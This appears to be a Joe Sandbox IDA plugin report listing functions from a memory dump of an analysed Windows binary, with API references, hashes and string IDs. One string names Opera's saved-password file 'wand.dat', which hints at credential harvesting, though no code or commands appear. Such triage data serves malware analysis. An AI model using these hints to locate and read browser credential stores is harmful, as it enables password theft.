                                                                    • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                    • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                    • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                    APIs
                                                                      • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                      • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                    • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                    • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                    • String ID: MS Sans Serif
                                                                    • API String ID: 210187428-168460110
                                                                    • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                    • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                    • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                    • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040560C
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                      • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                    • String ID: *.*$dat$wand.dat
                                                                    • API String ID: 2618321458-1828844352
                                                                    • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                    • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                    • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                    • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00412057
                                                                      • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                    • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                    • GetKeyState.USER32(00000010), ref: 0041210D
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                    • String ID:
                                                                    • API String ID: 3550944819-0
                                                                    • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                    • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                    • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                    • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                    APIs
                                                                    • wcslen.MSVCRT ref: 0040B1DE
                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                      • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                                    • memcpy.MSVCRT ref: 0040B248
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$memcpy$mallocwcslen
                                                                    • String ID:
                                                                    • API String ID: 3023356884-0
                                                                    • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                    • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                    • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                    • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 0040B0D8
                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                      • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                    • memcpy.MSVCRT ref: 0040B159
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$memcpy$mallocstrlen
                                                                    • String ID:
                                                                    • API String ID: 1171893557-0
                                                                    • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                    • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                    • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                    • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004144E7
                                                                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                      • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                    • memset.MSVCRT ref: 0041451A
                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                    • String ID:
                                                                    • API String ID: 1127616056-0
                                                                    • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                    • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                    • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                    • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                    APIs
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                                                    • malloc.MSVCRT ref: 00417459
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7622DF80,?,0041755F,?), ref: 00417478
                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$??3@malloc
                                                                    • String ID:
                                                                    • API String ID: 4284152360-0
                                                                    • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                    • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                    • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                    • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                    • RegisterClassW.USER32(00000001), ref: 00412428
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                    • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$ClassCreateRegisterWindow
                                                                    • String ID:
                                                                    • API String ID: 2678498856-0
                                                                    • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                    • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                    • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                    • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                    • malloc.MSVCRT ref: 00417407
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$??3@malloc
                                                                    • String ID:
                                                                    • API String ID: 4284152360-0
                                                                    • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                    • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                    • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                    • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040F673
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                    • strlen.MSVCRT ref: 0040F6A2
                                                                    • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                    • String ID:
                                                                    • API String ID: 2754987064-0
                                                                    • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                    • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                    • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                    • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                    APIs
                                                                      • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                      • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                      • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                    • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                    • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                    • String ID:
                                                                    • API String ID: 764393265-0
                                                                    • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                    • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                    • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                    • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                    APIs
                                                                    • memcpy.MSVCRT ref: 004134E0
                                                                    • memcpy.MSVCRT ref: 004134F2
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                    • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$DialogHandleModuleParam
                                                                    • String ID:
                                                                    • API String ID: 1386444988-0
                                                                    • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                    • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                    • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                    • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintfmemcpy
                                                                    • String ID: %2.2X
                                                                    • API String ID: 2789212964-323797159
                                                                    • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                    • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                    • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                    • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                    • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID: MZ@
                                                                    • API String ID: 1378638983-2978689999
                                                                    • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                    • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                    • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                    • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09